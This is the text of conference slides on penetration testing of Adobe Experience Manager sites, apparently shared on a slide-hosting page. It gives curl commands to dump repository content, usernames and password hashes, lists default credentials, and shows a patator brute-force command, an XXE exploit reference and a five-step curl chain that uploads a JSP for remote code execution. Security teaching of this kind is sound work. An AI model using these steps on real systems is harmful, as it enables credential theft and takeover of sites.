Upload
0ang3el
View
208
Download
12
Embed Size (px)
DESCRIPTION
This presentations is about pentesting AEM web applications. It have been shown on PHDays security conference.
Citation preview
Hack1ng Adobe Experience
Manager sites
Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com
Who is that guy?
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
Related Work
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
What do we want
Use JsonRendererServlet
Sensitive information from JCR
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json
List of all bundles
QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json
List customs scripts
List compiled custom scripts from cache
Custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
Dump content node properties
Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X GET http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "\n".join([m.group(1) for m in
re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |
sort u
Use QueryBuilder bundle
Password hashes
curl -X GET
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100
Dump content node properties
Use regular expression to check (pipe with prev command)
Anonymous modification
curl -X GET http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; m =
re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print
"Anon modification: ","Yes" if m else "No"'
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
Getting access
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5
XSS
CSRF
DoS
Read local files
RCE
You have access, now what?
Not covered, sorry!
CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
Webdav OSGI bundle uses XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE
Out-of-bound exploitationhttp://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need external server, instable
Inbound exploitation Pros: you do not need external server, more stable
Cons: you need credentials of the user that is able to modify some node in JCR
Webdav bundle, XXE
http://www.youtube.com/watch?v=Hg3AXoG89Gs
Webdav bundle, XXE Demo
We have node http://127.0.0.1:8080/rce
We have script exec.jsp that is magically loaded into node http://127.0.0.1:8080/apps/rcetype
When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
Step I: Create rcetype node
Remote code execution
curl u admin:admin Fjcr:primaryType=nt:folder
http://127.0.0.1:8080/content/rcetype
Step II: Upload script exec.jsp to rcetype node
Remote code execution
curl u admin:admin [email protected]
http://127.0.0.1:8080/content/rcetype
Step III: Copy rcetype to /apps
Remote code execution
curl u admin:admin F:operation=copy F:dest=/apps/rcetype
http://127.0.0.1:8080/content/rcetype
Step IV: Create rce node bound to rcetype
Remote code execution
curl u admin:admin Fsling:resourceType=rcetype
http://127.0.0.1:8080/content/rce
Step V: Launch jsp script
Remote code execution
curl X GET http://127.0.0.1:8080/content/rce.exec
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Remote code execution, Demo
Ask a Ninja